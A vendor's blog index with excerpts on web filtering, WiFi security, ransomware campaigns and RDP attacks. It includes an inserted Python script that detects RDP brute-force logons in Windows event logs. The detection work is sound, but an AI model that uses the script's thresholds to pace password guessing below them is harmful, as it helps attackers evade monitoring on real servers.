The biggest problem with compiling a comparison of WebTitan Cloud v Cisco Umbrella is that the Cisco Umbrella range consists of four packages with an increasing number of capabilities per package. Additionally, there is a lack of transparency about Cisco Umbrella pricing and how many add-ons a business may need to filter the Internet effectively. When Cisco Systems Inc. acquired OpenDNS in 2015, there was only one Cisco DNS filtering and Internet security package available – the former OpenDNS Umbrella. Since the acquisition, Cisco has broken Umbrella down into four sets of capabilities – ostensibly to better meet the needs of all businesses but, in practice, to disguise the cost of the packages. By comparison, WebTitan Cloud is similar in many ways to v1, launched in 2009. Naturally there have been some improvements made to its capabilities along the way; however, the DNS filtering and Internet security solution is still as flexible and scalable as it ever was, meeting the needs of businesses and Managed Service Providers (MSPs) of all sizes.

WebTitan Cloud v Cisco Umbrella Comparison

The best way to compare WebTitan Cloud v Cisco Umbrella is to list a selection of capabilities in each Cisco Umbrella package and then see where WebTitan Cloud fits into the range. The following is a snapshot of the capabilities of each Cisco Umbrella package, which demonstrates how the sophistication of each package increases as you work through the range. The key points to note are: The DNS Essentials package does not inspect and decrypt SSL traffic. This means that any encrypted website that has not yet been identified as a threat will bypass the DNS filter. Both the DNS Essentials and DNS Advantage packages lack granular filtering, inasmuch as it is only possible to block or allow website access by domain name, rather than by URL.
Although classified as a Secure Access Service Edge (SASE) solution, the SIG Essentials package lacks some key service edge security capabilities and is limited in others. The SIG Advantage package includes many capabilities that businesses may already have access to via other security solutions (e.g., Microsoft Sentinel, Amazon Security Lake,...

Why Change from Cisco Umbrella to WebTitan?

If you subscribe to a Cisco Umbrella DNS filtering and Internet security service, it may be worth considering a change from Cisco Umbrella to WebTitan Cloud. In this post we explain some of the main benefits of changing from Cisco Umbrella to WebTitan and illustrate this with an example from the education sector. Cisco Umbrella has evolved from the former OpenDNS Enterprise service into a four-tiered DNS filtering and Internet security service. At the entry-level tier, businesses get a less-than-ideal service with basic web filtering capabilities that lack SSL decryption and inspection, while at the top tier businesses can find themselves paying for services they may never use or that are already present in other security solutions. Selecting the right tier of service to best protect the business from web-borne threats and control Internet activity is not the only challenge. One of the reasons businesses change from Cisco Umbrella to WebTitan is a lack of transparency about the cost of Cisco Umbrella – notwithstanding that businesses not only have to pay the licensing fee, but also the cost of mandatory and optional add-ons to maximize the effectiveness of the service.

Cisco Umbrella Licensing

Like most software services, Cisco Umbrella licensing is via a subscription. Terms are for one year or three years, and in most cases must be paid upfront in full. The licensing cost does not include mandatory onboarding and technical support, while there is a further “optional add-on” for premium support if a business wants its calls to support to be prioritized. Basically, businesses have to pay twice to get a decent level of support from Cisco. Other optional add-ons vary according to which tier is subscribed to – and some are not available in all tiers. For example, if you want to identify which internal IP address was responsible for a malware download, you have to subscribe to a secondary Cisco service.
However, this option is not available to subscribers of the DNS Essentials tier. Other optional add-ons and limitations by tier are illustrated in the table below.

Cisco Umbrella Pricing

Cisco Umbrella pricing is variable depending on the number of...

How to Improve Wireless Access Point Security

It is straightforward to implement security controls to protect wired networks, but many businesses fail to apply the same controls to improve WiFi security, often due to a lack of understanding about how to improve wireless access point security. In this post we cover some of the main threats associated with WiFi networks and explain how easy it can be to improve wireless access point security.

Wireless Access Points are a Security Risk

Most businesses now apply web filters to control the types of content that can be accessed by employees on their wired networks, but securing wireless networks can be more of a challenge. It is harder to control and monitor access and block content on WiFi networks. Anyone within range of the access point can launch an attack, especially on public WiFi hotspots, which have one set of credentials for all guest users. It is therefore essential that controls are implemented to improve wireless access point security and protect users of the WiFi network.

WiFi Security Threats

A single set of credentials means cybercriminals are afforded a high degree of anonymity. That allows them to use WiFi networks to identify local network vulnerabilities virtually undetected. They could conduct brute force attacks on routers, for example, or use WiFi access to inject malware on servers that lack appropriate security. If access is gained to the router, attacks can be launched on connected devices, and malware can be installed on multiple endpoints or even POS systems to steal customers’ credit/debit card information. The cyberattack on Dyn is a good example of how malware can be installed and used for malicious purposes. The DNS service provider was attacked, which resulted in large sections of the Internet being made inaccessible. A botnet of more than 100,000 compromised routers and IoT devices was used in the attack. Man-in-the-Middle attacks are also common on Wi-Fi networks.
Any unencrypted content can be intercepted, such as when information is exchanged between a user and an HTTP site rather than an HTTPS site and no VPN is used. Public WiFi networks are often used for all manner of nefarious purposes due to the anonymity provided. If users take...

Internet Filtering to Improve Employee Productivity

In this post we explore the use of Internet filtering to improve employee productivity, including statistics from recent surveys that show how many companies are now choosing to control employee Internet access more carefully.

Employee Productivity Falls on Black Friday and Cyber Monday

The staffing firm Robert Half Technology recently conducted a survey of 2,500 chief information officers (CIOs) across 25 metropolitan areas in the United States and more than 1,000 U.S. office workers over 18 years of age to determine how Black Friday and Cyber Monday affect employee productivity. The results of the survey provide an indication of what goes on throughout the year, but Black Friday and Cyber Monday were studied as they are the two busiest days for online shopping. The survey results show that three-quarters of employees spent at least some of Cyber Monday shopping online on a work device. Four out of 10 workers said they spent more than an hour looking for bargains online on Cyber Monday while they were at work. 23% said they were expecting to spend even longer than that this year. 46% of workers said they would be online shopping on their work computers during their lunch hour and breaks, but 29% said they would be shopping throughout the day and would be keeping browser tabs open. 20% of workers said they would do online shopping at work in the morning. While policies on accessing pornography may have been made crystal clear, online shopping is something of a gray area. 31% of employees were not aware of their company’s stance on online shopping on work devices. 43% said their employers permit it and 26% said it is not permitted. The survey of CIOs shows 49% of companies allow online shopping within reason but monitor employee Internet use. 22% said they allow totally unrestricted Internet access, while 29% have implemented solutions to block access to online shopping sites.
In June 2018, Spiceworks published the results of a survey that showed 58% of organizations actively monitor employee Internet activity and 89% of organizations use Internet filters to block at least one category of Internet content. Most surveyed companies use Internet...

Dunkin Donuts Data Breach Highlights Risks of Password Reuse

A credential stuffing attack has led to a Dunkin Donuts data breach in which some customer data was compromised. While the breach was limited and most attempts to access customers’ DD Perks accounts were blocked, the incident does highlight the risks of password reuse. It is unclear exactly how many customers have been affected, but for certain customers the attackers may have gained access to their DD Perks accounts, the loyalty program run by the donut company. The Dunkin Donuts data breach was limited to first and last names, email addresses, DD Perks account numbers, and QR codes. The method used to gain access to customers’ DD Perks accounts was unsophisticated, cheap to conduct, and for the most part can be conducted automatically. Low cost and little effort make for a winning combination for hackers. The Dunkin Donuts data breach did not involve internal systems, and no credentials were stolen from the donut giant. Customers’ usernames (email addresses) and passwords were obtained from security breaches at other companies. Those usernames and passwords were then used in an automated attack on Dunkin Donuts customers’ DD Perks accounts. Dunkin Donuts has performed a password reset, and affected users will be required to choose a new password. New DD Perks account numbers will be given to affected customers, and their card balances will be transferred to the new accounts. Since Dunkin Donuts did not expose any passwords and its systems remained secure, the only individuals affected will be those who used the same password for their DD Perks account as they used on other online platforms.

The Risks of Password Reuse

Hackers obtain credentials from multiple data breaches, compile the data to create a list of passwords that have previously been used with a specific email address, then conduct what is known as a credential stuffing attack.
Multiple login attempts are made using the different passwords associated with an email address. The Dunkin Donuts data breach demonstrates the importance of good password hygiene and the risks of password reuse. Every user account must be secured with a strong, unique password – one that has...

WiFi Filtering and Protecting Your Brand

There are many reasons why businesses should implement a WiFi filtering solution, but one of the most important aspects of WiFi filtering is protecting your brand.

The Importance of Brand Protection

It takes a lot of hard work to create a strong brand that customers trust, but trust can easily be lost if a company’s reputation is damaged. If that happens, rebuilding the reputation of your company can be a major challenge. Brand reputation can be damaged in many ways, and damaging it is even easier now thanks to the Internet and the popularity of social media sites. Bad feedback about a company can spread like wildfire, and negative reviews are wont to go viral. Smart business owners are proactive and take steps to protect their digital image. They are quick to detect and act on online copyright infringements and other forms of brand abuse. They monitor social media websites and online forums to discover what people are saying about their company and how customers feel about their products and services. They also actively manage their online reputation and take steps to reinforce their brand image at every opportunity.

Cyberattacks Can Seriously Damage a Company’s Reputation

One aspect of brand protection that should not be underestimated is cybersecurity. Few things can have such a devastating impact on the reputation of a company as a cyberattack and data breach. A company that fails to secure its POS systems, websites, and network and experiences a breach that results in the theft of sensitive customer data can see its reputation seriously tarnished. When that happens, customers can be driven to competitors. How likely are customers to abandon a previously trusted brand following a data breach? A lot more likely than you may think! In late 2017, the specialist insurance services provider Beazley conducted a survey to find out more about the impact of a data breach on customer behavior.
The survey was conducted on 10,000 consumers, and 70% said that if a company experienced a data breach that exposed their sensitive information they would no longer do business with the brand.

WiFi Filtering and Protecting Your Brand

The use of Wi-Fi filtering for protecting...

DNS Web Filtering for MSPs – Improve Security for Your Clients and Your Bottom Line

DNS web filtering for MSPs is an easy way to improve security for your clients, save them money, and boost your profits. This post explains the benefits of a DNS-level web filter for MSPs and their clients. DNS web filtering is a great way for MSPs to boost profits, save clients money, and better protect them from cyber threats. Web filtering is an essential cybersecurity measure that businesses of all sizes should be using as part of their arsenal against malware, ransomware, botnets, and phishing attacks. However, many MSPs fail to include web filtering in their security offerings and consequently miss out on an important income stream: one that requires little effort and generates regular monthly revenue.

What Are the Benefits of Web Filtering?

There are two main benefits of web filtering: enforcing Internet usage policies and improving cybersecurity. Employees need to be able to access the Internet for work purposes, but many employees spend a considerable percentage of their working day accessing websites that have no work purpose. Cyberslacking costs businesses dearly. Businesses that do not filter the Internet will be paying their employees to check personal mail, view YouTube videos, visit dating websites, and more. A web filter will help to curb these non-productive activities and will also prevent employees from accessing inappropriate or illegal web content, which helps avoid legal and compliance issues. A recent study by Spiceworks revealed the extent of the problem. 28% of employees at large companies (more than 1,000 employees) spend more than four hours a week on personal Internet use, and the percentages increase to 45% for mid-sized businesses and 51% for small businesses. The difference in those figures reflects the fact that more large businesses have implemented web filters.
89% of large companies have implemented a web filter to curb or prevent personal Internet usage and, as a result, they benefit from an increase in productivity of the workforce. Web filtering is essential in terms of cybersecurity. The Spiceworks study revealed 90% of large companies use a web filter to block malware and ransomware infections. A web filter prevents...

Ransomware is the Biggest Cyber Threat to SMBs

The biggest cyber threat to SMBs is ransomware, according to Datto’s State of the Channel Report. While other forms of malware pose a serious risk and the threat from phishing is ever present, ransomware was considered to be the biggest cyber threat to SMBs by the 2,400 managed service providers that were polled for the study. Many SMB owners underestimate the cost of mitigating a ransomware attack and think that the cost of cybersecurity solutions to prevent attacks, while relatively low, is not justified. After all, according to Datto, the average ransom demand is just $4,300 per attack. However, the ransom payment is only a small part of the total cost of mitigating an attack. The final cost is likely to be ten times the cost of any ransom payment. Datto points out that the average total cost of an attack on an SMB is $46,800, although there have been many cases where the cost has been far in excess of that amount. One of the most common mistakes made by SMBs is assuming that attacks will not occur and that hackers are likely to target larger businesses with deeper pockets. The reality is that SMBs are being targeted by hackers, as attacks are easier to pull off. SMBs tend not to invest as heavily in cybersecurity solutions as larger businesses do.

Anti-Virus Software is Not Effective at Preventing Ransomware Attacks

Many SMB owners mistakenly believe they will be protected by anti-virus software. However, the survey revealed that 85% of MSPs said clients that experienced a ransomware attack had anti-virus solutions installed. Anti-virus software may be able to detect and block some ransomware variants, but since new forms of ransomware are constantly being developed, signature-based cybersecurity solutions alone will not offer a sufficient level of protection. Many SMBs will be surprised to hear just how frequently SMBs are attacked with ransomware.
More than 55% of surveyed MSPs said their clients had experienced a ransomware attack in the first six months of this year and 35% experienced multiple attacks on the same day. Some cybersecurity firms have reported there has been a slowdown in ransomware attacks as cybercriminals are increasingly turning to cryptocurrency...

How to Improve Wi-Fi Security for Hotels and Prevent Data Breaches

Most businesses are aware of the importance of securing their Wi-Fi networks; however, in some industry sectors Wi-Fi security has not been given the importance it requires. Wi-Fi security for hotels, for instance, is often lacking, even though the hospitality sector is actively being targeted by cybercriminals who see hotel Wi-Fi as a rich picking ground.

Hotel Chains are Under Attack

Hotels are an attractive target for cybercriminals. They satisfy the two most important criteria for cybercriminals when selecting targets: valuable data that can be quickly turned into profit, and relatively poor cybersecurity, which makes conducting attacks more straightforward. In 2018, there have been several major cyberattacks on hotel groups. In November 2018, Federal Group, which runs luxury hotels in Tasmania, experienced an email security incident that exposed the personal data of some of its members. A cyberattack on the Radisson Hotel Group was also reported. In that case it resulted in the exposure of the personal information of its loyalty program members. In August, one of China’s largest chains of hotels – Huazhu Hotels Group Ltd, which operates 13 hotel brands – suffered a cyberattack that affected an estimated 130 million people. In June, one of Japan’s largest hotel groups, Prince Hotels & Resorts, experienced a cyberattack that impacted almost 125,000 customers. In 2017 there were major data breaches at Hilton, Hyatt Hotels Corporation, Trump Hotels, Four Seasons Hotels, Loews Hotels, Sabre Hospitality Solutions, and InterContinental Hotels Group, to name but a few.

The Cost of a Hotel Data Breach

When a data breach occurs the costs quickly mount. Access to data and networks must be blocked rapidly, the breach must be investigated, the cause must be found, and security must be improved to address the vulnerabilities that were exploited. That invariably requires consultants, forensic investigators, and other third-party contractors.
Affected individuals must be notified and credit monitoring and identity theft protection services may need to be offered. The direct costs of a hotel data breach are considerable. The Ponemon Institute calculated the...

How to block employees from accessing websites

Many businesses want to block websites at work and exercise greater control over employee internet access. Acceptable internet usage policies can be developed and employees told what content they are allowed to access at work, but there are always some employees who will ignore the rules. In some cases, policy violations may warrant instant dismissal or other disciplinary action, which takes HR staff away from other important duties. If staff are fired, replacements must be found, trained, and brought up to speed, and the productivity losses that result can be considerable.

The Dangers of Unfettered Internet Access

Before explaining how to block websites at work, it is worthwhile explaining the problems that can arise from the failure to exert control over the content that can be accessed through wired and wireless networks. While extreme cases of internet abuse need to be tackled through HR, low-level internet abuse can also be a problem. Any time an employee accesses a website for personal reasons, it is time that is not being spent on work duties. Checking emails or quickly visiting a social media website is unlikely to have a major impact on productivity, but when cyber-slacking increases its effect can certainly be felt. If all employees spent 30 minutes a day on personal internet use, the productivity losses would be considerable – a business with 100 workers would lose 50 hours of working time a day, or 1,100 hours a month! In addition to lost opportunities, internet use carries a risk. Casual surfing of the internet by employees increases the probability of users encountering malware. Accessing personal webmail at work could easily result in a malware infection on a work device, as personal mail accounts are not protected by the filtering controls of an organization’s email security gateway. If illegal activities are taking place at work, the legal ramifications can be considerable.
It will be the business that is liable in many cases, rather than the individual employee. The easiest solution is for businesses to enforce their acceptable internet usage policies and simply block websites at work that are not required for normal working...

How to Prevent Windows Remote Desktop Protocol Attacks

Windows Remote Desktop Protocol attacks are one of the most common ways cybercriminals gain access to business networks to install backdoors, gain access to sensitive data, and install ransomware and other forms of malware. This attack method has been increasing in popularity over the past two years and there has also been a notable rise in darknet marketplaces selling exposed RDP services and RDP login credentials. The high number of Remote Desktop Protocol attacks has prompted the Federal Bureau of Investigation (FBI) Internet Crime Complaint Center (IC3) and the Department of Homeland Security to issue an alert to businesses in the United States to raise awareness of the threat. Remote Desktop Protocol is a proprietary Windows network protocol that allows individuals to remotely access computers and servers over the Internet and gain full control of resources and data. RDP is often used for legitimate purposes, such as allowing managed security service providers (MSSPs) and managed service providers (MSPs) to remotely access devices to provide computer support without having to make a site visit. Through RDP, input such as mouse movements and keystrokes can be transmitted over the Internet with a graphical user interface sent back. In order to gain access to a machine using RDP, a user must be authenticated by supplying a username and password. Once a user is authenticated, the resources on that device can be accessed. While authorized individuals can use RDP connections, so too can cybercriminals if they have access to login credentials or are able to guess usernames and passwords. As with any software, RDP can contain flaws. For instance, flaws in the CredSSP encryption mechanism could be exploited to perform man-in-the-middle attacks. Cybercriminals are identifying vulnerable RDP sessions over the Internet and are exploiting them to gain access to sensitive information and conduct extortion attacks. 
The threat actors behind SamSam ransomware, which has been used in many attacks on U.S. businesses, educational institutions, and healthcare providers, often gain access to networks through brute force attempts to guess weak passwords. The threat actors...

Princess Evolution Ransomware Offered as RaaS

Princess Locker ransomware has now morphed into Princess Evolution ransomware. The latest variant is one of several cryptoransomware threats that maximize the number of infections by using an affiliate distribution model, termed Ransomware-as-a-Service or RaaS. RaaS sees affiliates given a percentage of the ransom payments they generate, while the author of the ransomware also takes a cut of the profits. Under this business model, the author can generate a much higher number of infections, which means more ransom payments. The affiliates get to conduct ransomware campaigns without having to develop their own ransomware, and the author can concentrate on providing support and developing the ransomware further. For Princess Evolution ransomware, the split is 60/40 in favor of the affiliate. The RaaS is being promoted to prospective affiliates on underground web forums. Ransomware attacks involving RaaS use a variety of methods to distribute the malicious payload, as multiple actors conduct campaigns. Spam email is usually the main delivery mechanism for RaaS affiliates, as it is easy to purchase large quantities of email addresses on darkweb sites to conduct campaigns. Brute force attacks are also commonly conducted. Princess Evolution ransomware has also been loaded into the RIG exploit kit and is being distributed via web-based attacks. These web-based attacks take advantage of vulnerabilities in browsers and browser plug-ins. Exploits for these vulnerabilities are loaded into the kit, which is installed on attacker-controlled web domains. Often legitimate sites are compromised and have the exploit kit loaded without the knowledge of the site owner. Traffic is generated to the websites through search engine poisoning, malvertising, and spam emails containing hyperlinks to the websites. If a user visits the website and has an exploitable vulnerability, the Princess Evolution ransomware will be silently downloaded.
At this stage, there is no free decryptor for Princess Evolution ransomware. If this ransomware variant is downloaded and succeeds in encrypting files, recovery is only possible by paying the ransom for the keys to unlock the encryption or rebuilding...

Benefits of Web Filtering for Businesses

Why should businesses use a web filtering solution? Listed below are three key benefits of web filtering for businesses.

Protection Against Exploit Kits

Email spam is the most common attack vector used to deliver malware, and while the threat from exploit kits is nowhere near the level seen in 2015 and 2016, they still pose a problem for businesses. Exploit kits are web-based apps that are loaded onto websites controlled by cybercriminals – either their own sites or sites that have been hijacked. Exploit kits contain code that exploits vulnerabilities in web browsers, plugins, and browser extensions. When a user with a vulnerable browser visits a malicious URL hosting an exploit kit, the vulnerability is exploited and malware is downloaded. With browsers becoming more secure, and Flash being phased out, it has become much harder to infect computers with malware via exploit kits, and many threat actors have moved on to other methods of attack. However, some exploit kits remain active and still pose a threat. The exploit kits currently in use – RIG, for example – contain multiple exploits for known vulnerabilities. Most of the vulnerabilities are old and patches have been available for months or years, although zero-day exploits are occasionally added. Exploit kits are also updated with recently disclosed proof-of-concept code. Exploit code for two recently discovered vulnerabilities, one in Internet Explorer (CVE-2018-8174) and one in Adobe Flash (CVE-2018-4878), has already been added to EKs. Keeping browsers and plugins up to date and using a top antivirus solution will provide a good level of protection, although businesses can further enhance security by using a web filter. Web filtering for businesses ensures that any attempt to access a website known to host an exploit kit will be blocked.

Blocking Phishing Attacks

Phishing is one of the biggest threats faced by businesses.
Phishing is a method of obtaining sensitive information by deception, such as impersonating a company in an attempt to obtain login credentials or to fool employees into making wire transfers to bank accounts controlled by criminals. A spam filter can prevent the majority of...

Employee Negligence is the Biggest Cybersecurity Risk for Businesses

The biggest cybersecurity risk for businesses in the United States is employee negligence, according to a recent Shred-It survey of 1,000 small business owners and C-suite executives. The findings of the survey, detailed in its North America State of the Industry Report, show the biggest cybersecurity risk for businesses is human error, such as the accidental loss of data or devices containing sensitive company information. 84% of C-suite executives and 51% of small business owners said employee negligence was the biggest cybersecurity risk for their business. 42% of small business owners and 47% of C-suite executives said employee negligence was the leading cause of cybersecurity breaches.

Employees are the Biggest Cybersecurity Risk for Businesses in the United States

Employees often cut corners in order to get more done in their working day and take considerable security risks. Even though laptop computers can contain highly sensitive information and allow an unauthorized individual to gain access to a work network, around a quarter of U.S. employees leave their computers unlocked and unattended. Documents containing sensitive information are often left unattended in full view of individuals who are not authorized to view the information. The risks taken by employees are greater when working remotely, such as in coffee shops or at home. 86% of executives and SBOs said remote workers were much more likely to cause data breaches. 88% of C-suite executives and 48% of small business owners said they have implemented flexible working models that allow their employees to spend at least some of the week working off site. A survey conducted on behalf of the Switzerland-based serviced office provider IWG suggests that globally, 70% of workers spend at least one day a week working remotely, while 53% work remotely for at least half of the week.
Adoption of these flexible working practices is increasing, although cybersecurity policies are not being implemented that specifically cover remote workers. Even though a high percentage of workers are spending at least some of the week working remotely, the Shred-It survey shows that more than half of SMBs do not have policies...

Loapi Malware Infections Destroy Android Phones

Loapi malware is a new Android malware variant that is capable of causing permanent damage to Android smartphones. The new malware variant was recently discovered by researchers at Kaspersky Lab. In contrast to many new malware variants that operate silently and remain on the device indefinitely, Loapi malware infections can be short-lived. Kaspersky performed a test on an Android phone and discovered that within two days the phone had been destroyed. The aim of the malware is not sabotage. Destruction of the device is just collateral damage that results from the intense activity of the malware. Loapi malware performs a wide range of malicious functions simultaneously, including some processor-intensive activities that cause the device to overheat, causing irreparable damage. In the test, over the two days, the constant activity caused the device to overheat and the battery to bulge, deforming the device and its cover. The researchers said Loapi malware is like no other malware variant they have seen, and the researchers have seen plenty. Loapi malware was called a ‘jack of all trades’ due to its extensive capabilities. The malware is used to mine the cryptocurrency Monero, a processor-intensive process. The malware uses the processing power of infected devices to create new coins. While the mining process is less intensive than for Bitcoin, it still takes its toll. Additionally, the malware allows infected devices to be used in DDoS attacks, making constant requests to websites to take down online services. The malware is used to spam advertisements, bombarding the user with banners and videos. The malware will silently subscribe to online services, and if they require text message confirmation, that is also handled by the malware. The malware gains access to SMS messages and can send text messages to any number, including premium services. Text messages are also used to communicate with its C2 server.
Messages are subsequently deleted by the malware to prevent detection by the user, along with any text message confirmations of subscriptions to online services. Kaspersky Lab researchers note that the malware attempted to access more than 28,000 URLs in the two days...

LockCrypt Ransomware Distributed Using Brute Force RDP Attacks

A malware threat called LockCrypt ransomware is being used in widespread attacks on businesses in the United States, United Kingdom, and South Africa. While ransomware is commonly spread via spam email, this campaign spreads the file-encrypting malware via remote desktop protocol (RDP) brute force attacks. The LockCrypt ransomware attacks were first detected in June this year, but over the past few months the number of attacks has increased significantly, with October seeing the highest number of attacks so far this year. LockCrypt ransomware is a relatively new malware variant, having first been seen in June 2017. Once infected, users will be unable to access their files. This ransomware variant uses RSA-2048 and AES-256 cryptography, which makes it virtually impossible to recover files without paying the ransom demand if a viable backup does not exist. To make recovery more difficult, LockCrypt ransomware also deletes Windows Shadow Volume copies. Encrypted files are given the .lock extension. The ransom payment for this campaign is considerable – typically between 0.5 and 1 Bitcoin per encrypted server. That’s between $3,963 and $7,925 per compromised server; however, since the same login credentials are often used for RDP access on multiple servers, once one password is correctly guessed, it can be used to access multiple servers and deploy LockCrypt ransomware on each. One of the Bitcoin addresses used by the attackers shows one company paid a ransom of $19,000 to recover files on three of its servers. Once access to a server is gained, the ransomware is deployed; however, the attackers are also manually interacting with compromised servers. AlienVault security researcher Chris Doman reported that for one company, in addition to deploying ransomware, the attackers “manually killed business critical processes for maximum damage.” All non-core processes on an infected server are killed.
The attacks do not appear to be targeted, instead they are randomly conducted on business servers. Businesses that are most likely to have ransomware installed are those that have failed to use complex passwords for RDP access. While it may be tempting to set an easy-to-remember password,...
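The RDP brute force pattern behind this campaign is visible in the Windows Security log well before any ransomware is dropped. The following is an added example, not code from the original article or from AlienVault's research: it parses constructed 4625/4624 records (the log layout, addresses and account names are assumed for illustration) and flags a source address whose burst of failed RDP logons inside a sliding window is followed by a success, which is the moment a guessed password should be treated as a compromise rather than noise.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in the shape of an exported Windows Security log. Event ID
# 4625 is a failed logon, 4624 a successful one. Logon type 10 is
# RemoteInteractive (RDP); type 3 is what RDP produces when Network Level
# Authentication is enabled. Addresses and account names are made up.
SAMPLE_LOG = """\
2017-10-12T03:14:07Z EventID=4625 LogonType=10 TargetUser=administrator SourceIP=203.0.113.45
2017-10-12T03:14:09Z EventID=4625 LogonType=10 TargetUser=administrator SourceIP=203.0.113.45
2017-10-12T03:14:12Z EventID=4625 LogonType=10 TargetUser=administrator SourceIP=203.0.113.45
2017-10-12T03:14:15Z EventID=4625 LogonType=10 TargetUser=admin SourceIP=203.0.113.45
2017-10-12T03:14:19Z EventID=4625 LogonType=10 TargetUser=administrator SourceIP=203.0.113.45
2017-10-12T03:14:23Z EventID=4625 LogonType=10 TargetUser=administrator SourceIP=203.0.113.45
2017-10-12T03:15:02Z EventID=4624 LogonType=10 TargetUser=administrator SourceIP=203.0.113.45
2017-10-12T08:00:00Z EventID=4625 LogonType=10 TargetUser=jsmith SourceIP=192.0.2.10
2017-10-12T08:00:30Z EventID=4624 LogonType=10 TargetUser=jsmith SourceIP=192.0.2.10
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<eid>\d+) LogonType=(?P<lt>\d+) "
    r"TargetUser=(?P<user>\S+) SourceIP=(?P<ip>\S+)$"
)


def parse_events(log_text):
    """Turn exported log lines into dicts, oldest first; non-matching lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "eid": int(m["eid"]),
            "logon_type": int(m["lt"]),
            "user": m["user"],
            "ip": m["ip"],
        })
    events.sort(key=lambda e: e["ts"])
    return events


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Flag source IPs with >= threshold failed RDP logons inside a sliding window.

    Returns {ip: alert}. Each alert records the distinct usernames tried (one
    account hammered = brute force; many accounts = password spraying) and
    whether a successful logon from the same IP followed the burst, which is
    the signal that a password was guessed and the host is now in the attacker's hands.
    """
    recent_failures = defaultdict(deque)  # ip -> timestamps of failures inside the window
    tried_users = defaultdict(set)
    alerts = {}
    for e in events:
        if e["logon_type"] not in (3, 10):  # only RDP-style logons
            continue
        if e["eid"] == 4625:
            q = recent_failures[e["ip"]]
            q.append(e["ts"])
            tried_users[e["ip"]].add(e["user"])
            while q and e["ts"] - q[0] > window:  # expire failures older than the window
                q.popleft()
            if len(q) >= threshold:
                a = alerts.setdefault(e["ip"], {
                    "failures": 0, "first": q[0], "last": e["ts"],
                    "users": set(), "success_after_burst": False, "success_user": None,
                })
                a["failures"] = max(a["failures"], len(q))
                a["last"] = e["ts"]
                a["users"] = tried_users[e["ip"]]
        elif e["eid"] == 4624 and e["ip"] in alerts:
            alerts[e["ip"]]["success_after_burst"] = True
            alerts[e["ip"]]["success_user"] = e["user"]
    for a in alerts.values():
        a["users"] = sorted(a["users"])
    return alerts


if __name__ == "__main__":
    for ip, alert in detect_rdp_bruteforce(parse_events(SAMPLE_LOG)).items():
        print(ip, alert)
```

On the sample, 203.0.113.45 is reported with six failures against two accounts followed by a successful logon as administrator, while the single typo from 192.0.2.10 never reaches the threshold. Feed real exports in, and treat a `success_after_burst` alert as an incident, not a password-policy reminder.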

Malvertising Phishing Attacks Soar, Underscoring Need for a Web Filter

Email may be the primary vector used in phishing attacks, but the second quarter of 2017 has seen a massive increase in malvertising phishing attacks. Malvertising is the term given to malicious adverts, which are often displayed on high-traffic websites via third party advertising networks. These adverts are used to direct web visitors to malicious websites, oftentimes sites containing exploit kits that probe for vulnerabilities and silently download ransomware and other malware. These malware attacks increased between 2015 and 2016, with the total number of malvertising attacks rising by 136%. Demonstrating how quickly the threat landscape changes, between Q1 and Q2, 2017 there was a noticeable decline in malicious advert-related exploit kit and malware attacks. Exploit kit redirects fell by 24% and malware-related adverts fell by almost 43%, according to a recent study released by RiskIQ. However, the study shows there was a massive increase in malvertising phishing attacks as cybercriminals changed their tactics. Phishing-related ads increased by 131% in Q2, 2017, and between 2015 and 2016, malvertising phishing attacks increased by a staggering 1,978%. The websites that these adverts direct users to often promise a free gift in exchange for taking part in a survey. Genuine market research firms tend not to offer large incentives for taking part in surveys, or when they do offer an incentive, participants are entered into a draw where they stand a chance of winning a prize. When gifts are offered to all participants, it is a warning sign that all may not be as it seems. That said, many people still fall for the scams. The aim of the surveys is to obtain sensitive information such as bank account information, Social Security numbers, usernames, passwords and personal information. The information can be used for a wide range of nefarious purposes. It is not only personal information that is sought.
Cybercriminals are keen to gain access to corporate email accounts for the data they contain and to use them to send phishing emails. When phishing attacks occur through corporate email accounts it can seriously tarnish a company’s reputation and may result in...

The High Cost of a Ransomware Attack

Why should businesses invest heavily in technology to detect ransomware attacks when a ransom payment may only be between $500 and $1,000? While that is what cybercriminals are charging as a ransom, the cost of a ransomware attack is far higher than any ransom payment. In fact, the ransom is often one of the lowest costs of a ransomware attack that businesses must cover. The ransom payment may seem relatively small, but the latest ransomware variants are capable of spreading laterally, infecting multiple computers and servers and encrypting network shares, and the ransom is then multiplied by the number of devices that have been infected.

The Cost of a Ransomware Attack Can Run to Millions of Dollars

When businesses suffer ransomware attacks, the attackers often set their ransoms based on the perceived ability of the organization to pay. In 2016, Hollywood Presbyterian Medical Center was forced to pay a ransom of 40 bitcoin (around $17,000 at the time) to regain access to its systems. When the San Francisco Muni was infected, hackers demanded 100 bitcoin (around $73,000) for the keys to unlock its payment system. In June 2017, South Korean web host Nayana agreed to pay $1 million for the keys to unlock the encryption of its 153 Linux servers and 3,400 customer websites. These ransom payments are high, but the ransom is only one cost of a ransomware attack. The biggest cost of a ransomware attack is often the disruption to business services while files are taken out of action. Systems can be taken out of action for several days, bringing revenue generating activities to an abrupt stop. One Providence law firm experienced downtime of three months following a ransomware attack, even though the $25,000 ransom was paid. Lawyers were stopped from working, causing a loss in billings of an estimated $700,000. In heavily regulated industries, notifications must be sent to all individuals whose information has been encrypted, and credit monitoring and identity theft services often need to be provided.
When hundreds of thousands of users’ data is encrypted, the cost of printing and mailing notifications and paying for credit monitoring services is substantial. Once an attack has been resolved, networks need to be analyzed to...

Neptune Exploit Kit Turns Computers into Cryptocurrency Miners

